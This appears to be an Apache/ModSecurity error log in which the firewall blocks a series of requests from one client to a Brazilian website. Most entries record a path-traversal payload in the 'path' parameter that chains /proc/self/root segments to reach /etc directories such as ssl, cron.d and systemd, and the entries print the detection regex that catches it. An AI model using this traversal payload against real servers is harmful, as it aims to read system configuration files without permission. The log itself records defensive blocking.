[Tue Mar 17 14:11:09.511628 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:56268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLLdY0UrI5A3LftIz71AAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:10.035110 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:56268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLLtY0UrI5A3LftIz71QAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:11.731947 2026] [:error] [pid 29359:tid 140411658000128] [client 74.7.241.31:56274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLL6Sy22zYCMGxsIlc7gAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:11.943688 2026] [:error] [pid 29359:tid 140411540502272] [client 74.7.241.31:56274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLL6Sy22zYCMGxsIlc7wAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:13.313783 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:56282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLMQeiSKl8TjouI-YZ7wAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:14.824703 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:56290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLMr-sgTmmJoPuMdy2xwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:16.343004 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.241.31:56302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLNKt8Nd0UC_OcbVHLYgAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:17.827138 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:47032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLNfPqhzTj3BvfDX-IQQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:19.253516 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.241.31:47040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLN64xEDsg_V3ESNZM2AAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:28.161777 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35408] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:11:29.722924 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:57874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLQXIk7brgkOH-rIWMOgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:31.606430 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:57878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLQ3Ik7brgkOH-rIWMOwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:33.253341 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:57884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLRaBJNF7axNlVR0UXIQAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:36.157904 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.31:57892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLSNCmCSWTlPouqorkwwAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:38.500194 2026] [:error] [pid 29359:tid 140411708356352] [client 74.7.241.31:59346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLSqSy22zYCMGxsIlc8gAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:39.044773 2026] [:error] [pid 29359:tid 140411616036608] [client 74.7.241.31:59346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLS6Sy22zYCMGxsIlc8wAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:41.125456 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:59356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLTNY0UrI5A3LftIz72QAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:42.478769 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:59358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLTr-sgTmmJoPuMdy2yQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:44.223776 2026] [:error] [pid 29359:tid 140411607643904] [client 74.7.241.31:59372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLUKSy22zYCMGxsIlc9AAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:45.945904 2026] [:error] [pid 29359:tid 140411641214720] [client 74.7.241.31:59376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLUaSy22zYCMGxsIlc9QAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:46.278931 2026] [:error] [pid 29359:tid 140411658000128] [client 74.7.241.31:59376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLUqSy22zYCMGxsIlc9gAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:47.687581 2026] [:error] [pid 30223:tid 140411725141760] [client 74.7.241.31:49170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLU8T4LuLykoMK_89o6gAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:49.610228 2026] [:error] [pid 30223:tid 140411548894976] [client 74.7.241.31:49174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 